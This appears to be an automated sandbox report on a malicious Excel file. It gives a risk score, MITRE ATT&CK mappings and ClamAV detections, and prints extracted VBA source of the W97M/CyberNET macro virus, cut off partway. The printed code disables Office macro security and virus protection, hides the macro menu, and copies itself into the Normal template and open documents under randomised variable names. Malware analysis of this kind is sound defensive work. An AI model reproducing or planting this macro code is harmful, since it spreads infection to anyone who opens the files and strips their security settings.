MALICIOUS
400
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1082 System Information Discovery
T1204.002 Malicious File
This Excel file contains VBA macros, including Workbook_Open and Document_Open, which are designed to execute automatically. The macros utilize Shell() and CreateObject calls, indicating an intent to run arbitrary code and likely download a secondary payload. The presence of ClamAV detections for 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Cybernet-1' further confirms its malicious nature.
Heuristics 8
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 6 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13618 bytes |
SHA-256: a6fe075211cde3504cd3d62f713a0f269b92422fb033a02c7a45bc8d395ab6dc |
|||
|
Detection
ClamAV:
Doc.Trojan.Cybernet-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
'W97M/CyberNET (C)2000 - Indonesia By AnomOke! "I'm NOT Responsible For Any Damage That Posible Cause By My Virus...!!!"
Application.EnableCancelKey = wdCancelDisabled: Options.SaveInterval = 1: Options.ConfirmConversions = False: Options.SaveNormalPrompt = False: Application.DisplayRecentFiles = False
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else: Options.VirusProtection _
= False: System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel", "Options6") = &H0: End If
Call HH9466
If Day(Now) = 17 And Month(Now) = 8 Or Day(Now) = 25 And Month(Now) = 12 Then
Randomize: For HK184 = 1 To (Int(Rnd * 70))
ActiveDocument.Shapes.AddShape(Int(Rnd * 120), Int(Rnd * 200), Int(Rnd * 500), Int(Rnd * 500), Int(Rnd * 500)).Select
Selection.ShapeRange.Fill.ForeColor.RGB = RGB(Int(Rnd * 255), Int(Rnd * 255), Int(Rnd * 255))
Selection.ShapeRange.Fill.Visible = msoTrue
Selection.ShapeRange.Fill.Solid: Next HK184
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName: Call VC6648: End If
MN5776 = ActiveDocument.VBProject.VBComponents(1).CodeModule.CountOfLines
RQ8515 = NormalTemplate.VBProject.VBComponents(1).CodeModule.CountOfLines
If ActiveDocument.VBProject.Description <> "CyberNET" Or Left(ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = ActiveDocument.VBProject.VBComponents
Call NV6680(BR4082)
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Open()" & vbCr & NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(2, RQ8515 - 19))
ActiveDocument.VBProject.Description = "CyberNET"
End If
If NormalTemplate.VBProject.Description <> "CyberNET" Or Left(NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 14), 14) <> "'W97M/CyberNET" Then
Set BR4082 = NormalTemplate.VBProject.VBComponents
Call NV6680(BR4082)
Randomize
Dim UR50(1 To 37) As String
UR50(1) = "RP6236"
UR50(2) = "JI3255"
UR50(3) = "FR3570"
UR50(4) = "HH8039"
UR50(5) = "JT9846"
UR50(6) = "MN5776"
UR50(7) = "RQ8515"
UR50(8) = "BR4082"
UR50(9) = "JT8173"
UR50(10) = "LK8445"
UR50(11) = "EE7111"
UR50(12) = "NU6972"
UR50(13) = "HH9466"
UR50(14) = "RK5344"
UR50(15) = "AJ8871"
UR50(16) = "MU2056"
UR50(17) = "QH442"
UR50(18) = "CH2979"
UR50(19) = "AD5532"
UR50(20) = "QF692"
UR50(21) = "NV6680"
UR50(22) = "KE184"
UR50(23) = "GC2158"
UR50(24) = "HK184"
UR50(25) = "CR1726"
UR50(26) = "BG8413"
UR50(27) = "CK5437"
UR50(28) = "NL9381"
UR50(29) = "OL8190"
UR50(30) = "KD1649"
UR50(31) = "BM5181"
UR50(32) = "GN4877"
UR50(33) = "VC6648"
UR50(34) = "IM6298"
UR50(35) = "UV3228"
UR50(36) = "DC5962"
UR50(37) = _
"UR50"
For NU6972 = 1 To 37
JT8173 = (Chr(65 + Int(Rnd * 22))) & (Chr(65 + Int(Rnd * 22))) & Int(Rnd * 100) & Int(Rnd * 100)
Call JT9846(JT8173, UR50(NU6972))
Next NU6972
ActiveDocument.Saved = True
BR4082(1).CodeModule. _
AddFromString ("Private Sub Document_Close()" & vbCr & ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(2, MN5776 - 1) & _
vbCr & "Sub ViewVBCode()" & vbCr & "CommandBars(" & Chr(34) & "Tools" & Chr(34) & ").Controls(" & Chr(34) & "Macro" & Chr(34) & ").Enabled = False" & vbCr & "End Sub" & vbCr & "Sub ToolsMacro()" _
& vbCr & "Call ViewVBCode" & vbCr & "End Sub" & vbCr & "Sub FileOpen()" & vbCr & "WordBasic.DisableAutoMacros True" & vbCr & "On Error Resume Next" & vbCr & _
"If Dialogs(80).Show <> 0 Then Call Document_Close" & vbCr & "WordBasic.DisableAutoMacros False" & vb
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.